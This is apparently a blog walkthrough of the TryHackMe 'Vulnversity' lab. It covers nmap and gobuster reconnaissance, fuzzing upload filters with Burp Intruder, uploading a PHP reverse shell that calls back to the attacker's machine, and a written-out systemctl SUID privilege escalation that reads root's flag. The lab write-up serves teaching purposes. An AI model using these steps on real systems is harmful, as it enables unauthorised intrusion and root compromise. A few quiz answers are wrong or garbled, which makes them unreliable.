Tryhackme room ⇒ https://tryhackme.com/room/vulnversity
Task 1⇒ Deploy the machine
You dont know how to start a machine and connect to vpn ?
What are you doing in this room?
Task 2⇒ Reconnaissance
The always first step to start from, Reconnaissance.
So let’s get started.
Scan this box:
nmap -sV -sC <machines ip>
-sV ⇒ If some ports are found to be open, Nmap may be able to determine what server software is running on the remote system. Version detection is enabled by the -sV option.
-sC ⇒ Performs a script scan using the default set of scripts.
└─$ nmap -sV -sC 10.10.101.12
Starting Nmap 7.91 ( [https://nmap.org](https://nmap.org/) ) at 2021-05-24 22:56 IST
Nmap scan report for 10.10.168.183
Host is up (0.19s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|*clock-skew: mean: 1h20m01s, deviation: 2h18m35s, median: 0s
|nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
| System time: 2021-05-24T13:27:56-04:00
| account_used: guest
| authentication_level: user
| challenge_response: supported
|* message_signing: disabled (dangerous, but default)
|_ Message signing enabled but not required
| date: 2021-05-24T17:27:54
|_ start_date: N/A
Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
Nmap done: 1 IP address (1 host up) scanned in 75.25 seconds
Here we are completed with the scan. So, let’s go with the results and answer the Questions asked in Task 2⇒
Scan the box, how many ports are open?
⇒ ( Oh, come on! just count it )
What version of the squid proxy is running on the machine?
⇒ 3.5.12 ( Watch out under 3333/tcp )
How many ports will Nmap scan if the flag -p-400 was used?
⇒ 400 ( Because They have used ‘
-p-’ which specifies no. Of ports to be scanned)
Using the Nmap flag -n what will it not resolve?
⇒ 400 ( Always check the
What is the most likely operating system this machine is running?
⇒ Ubuntu ( Check 22/tcp port)
What port is the webserver running on?
It’s important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)
Task 3⇒ Locating directories using GoBuster
Using a fast directory discovery tool called
GoBuster, you will locate a directory that you or attackers usually can’t see or find as the directories are hidden.
If you’re on Kali Linux, run
sudo apt-get install gobuster
Now lets run GoBuster with a wordlist⇒
gobuster dir -u http://<ip>:3333 -w <wordlist location>
dir For specifying directory attack
-u The target URL
-w Path to your wordlist
└─$ gobuster dir -u http://10.10.101.12:3333/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: [http://10.10.101.12:3333/](http://10.10.101.12:3333/)
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
2021/05/24 22:58:13 Starting gobuster in directory enumeration mode
/images (Status: 301) [Size: 322] [--> [http://10.10.101.12:3333/images/](http://10.10.168.183:3333/images/)]
/css (Status: 301) [Size: 319] [--> [http://10.10.101.12:3333/css/](http://10.10.168.183:3333/css/)]
/js (Status: 301) [Size: 318] [--> [http://10.10.101.12:3333/js/](http://10.10.168.183:3333/js/)]
/fonts (Status: 301) [Size: 321] [--> [http://10.10.101.12:3333/fonts/](http://10.10.168.183:3333/fonts/)]
/internal (Status: 301) [Size: 324] [--> [http://10.10.101.12:3333/internal/](http://10.10.168.183:3333/internal/)]
- What is the directory that has an upload form page?
All the directories look quite normal but wait take a look at internal.
Lets hop to the http://10.10.101.12:3333/internal/ page.
What do you see?
An upload page.. whoo hoo! Let’s try exploiting this.
Task 4⇒ Compromise the webserver
Try upload a few file types to the server, what common extension seems to be blocked?
Lets see⇒ (.php) Read below to know how!!
Here I am doing a manual approach by myself to check Only basic file extensions if I am allowed to upload those ones.(Also tryhackme already has its hint in task.)
Anyways, if you wanna try an automated approach to check for different file extensions without knowing the specific ones, then first download seclists. These are also super easy to install, just use APT to pull it from the repos. and then simply load the payload from the file
Comment down if you wanna know more about it.
So moving further, website Seems to be easily accepting jpg, jpeg or png files.
Lets try uploading a .php extension file. why we chose php ? [ Because most probably we are gonna upload our php payload to get a reverse shell. ]
So, Our php file also got rejected. As you can see in Image 2.
Now according to Tryhackme’s task we should use different php extensions.
Lets just use Burp’s Intruder to fuzz this Target machine with different php extensions.
If you don’t know how to set up the Burpsuite, you can check Burpsuite Room on Tryhackme ⇒ https://tryhackme.com/room/rpburpsuite
Make sure the Foxxy proxy is set to Burp
Let’s jump back to Burp, Head to the proxy tab & Turn the interception on⇒
Now we will repeat the process of uploading a .php file and click on the submit button, and the request will be redirected to Burpsuite.
Let’s start then.
Step1. Click on the Browse button and upload a random file with .php or simply make one and click on submit.
Here you can see I chose a random.php file and when I click submit, my post request gets forwarded to burp suite.
Step2. Now head to Burpsuite as your request will be captured by Burpsuite under the Proxy tab.
Here you can see our Post request we made while uploading a .php file.
Step3. Right-click on the request made and click on send to the intruder.
Now we have forwarded our request to Intruder.
Step4. Switch to Intruder tab right beside proxy tab and under Intruder tab switch to positions tab as shown below in the image ⇒
Step5. Ok so we are finally in the Intruder tab and from here we will start setting up our Bruteforce list for extensions.
Firstly, As you see on the right side there are 4 options:- Add, Clear, Auto, Refresh. Click the Clear option.
Now, you will see all the selection on the pane is no more, so now we will select a string we want to brute force.
Here in screenshot, you see It’s showing my uploaded file name —> random.php
whatever the name of your file is just select the .php part of the whole name.
and again Go to the right side at those four options and click on Add option.
Now you will notice that around .php there is $ sign like this ⇒ §.php§
For reference check the images below ⇒
So, After this, you will see something like this ⇒
Step6. After completing the previous step head towards the Payloads tab right beside the Positions tab.
Here, we will enter all the php extensions we know to bruteforce the list to that upload file site.
Right under the heading Payload Options [Simple list]
Add these extensions ⇒
For reference see the screenshot below⇒
After Completing this, Just go a little bit down and you will see an option URL encode these characters under the heading Payload Encoding. Untick that option.
Finally, Start the Attack by clicking on the Start Attack button at the top-right corner.
So what do you see?
Here we dont see any difference in status of all Five extensions
But, look at length columns- Are all same ?
At no.5 i.e .phtml shows different output which means its behaving something differnt from others.
So, Now we got our Answer and will make our PHP payload in .phtml format.
Lets download our payload
Here is the link:- https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
copy the whole payload and make a new file on your desktop with name shell.phtml
Do change the ip adress to your tun 0 IP/attackerbox IP. Like this⇒
It should look like this⇒
Now let’s upload our payload to the webpage http://10.10.101.12:3333/internal/ [Dont forget to turn off the burp proxy so, Is not needed now]
There you see the Innocent website accepted our uploaded payload.
Let’s start a listener on our attacker machine and then activate the payload on the website by going to http://10.10.130.56:3333/internal/uploads/shell.phtml
Go back to your terminal, you shall get a reverse shell.
Now let’s search the flag.
execute the command
what do you see?
A home directory, for now, seems favourable to us. let’s jump to the home directory
This time we see the bill directory.
let’s switch to it.
ls, we get a user.txt file. run
cat command as obvious.
Hurray!! you got your first flag, so far so good !!
Answers to the Questions of this Task⇒
Try upload a few file types to the server, what common extension seems to be blocked?
what extension is allowed?
What is the name of the user who manages the webserver?
What is the user flag?
Task 5⇒ Privilege Escalation
Now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).
In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).
For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.
I know getting a reverse shell feels so good and fascinating. But what’s more fascinating? GETTING ROOT PRIVILEGES
Let’s do it then.
First, we will search for Suid files on the system. How to do that?
find / -perm -u=s -type f 2>/dev/null
find / : For looking at the root “/” directory
-perm : Specifying the permission bits that are set for the file
-u=s : specifying that we need suid bit permission for the user.
-type f : what are we searching for? directory or file or etc ? in our case its file, which is denoted by f in
2>/dev/null : In this
a number 2 = standard error (i.e. STDERR)
/dev/null = for redirecting the file 2 (i.e. STDERR) to /dev/null.
So in this case, we will dodge the unnecessary errors.
$ find / -perm -u=s -type f 2>/dev/null
Hey! do you see /bin/systemctl in the following above output ?
Note- Systemctl is the tool used to control the systemd init service.
Lets go to https://gtfobins.github.io/ for finding exploit related to systemctl
Here we have an exploit related to systemctl, let’s see what we get.
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
We get the following exploit.
Let me break the code for you==>>
TF=$(mktemp).service ⇒ Here as it seems, we are creating an environment variable TF( you can put any name you want, for now i let it be default).
Inside this variable we are specifiying a mktemp command(mktemp is provided to allow shell scripts to safely use temporary files.)
echo '[Service] ⇒ Its echoing the input, and that [ ' ]single quote is allowing us to enter several lines to complete our command.
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output" ⇒ Here when the system shell is called, the -c flag commands the shell to execute everything inside the quotes. Here we extracted the content of root.txt to our output file.
WantedBy=multi-user.target’ > $TF ⇒ set the level at which teh service will run. If you noticed the closing quotes, now these all processes are stored in to $TF
/bin/systemctl link $TF ⇒ we are linking your service with system control binary
/bin/systemctl enable --now $TF ⇒ we are now enabling the service to read the root.txt as we programmed.
let’s try it on our victim’s shell==>>
$ echo '[Service]
ExecStart=/bin/sh -c “ cat /root/root.txt > /tmp/output”
WantedBy=multi-user.target’ > $TF
$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.D92XBoZD7f.service to /tmp/tmp.D92XBoZD7f.service.
$ /bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.D92XBoZD7f.service to /tmp/tmp.D92XBoZD7f.service.
Finally, We are done extracting the flag. Lets check the path where we redirected the flag==>>
$ cat /tmp/output
Stay Connected guys.
Suggest me any writeups you want. I will try to bring up them to you.❤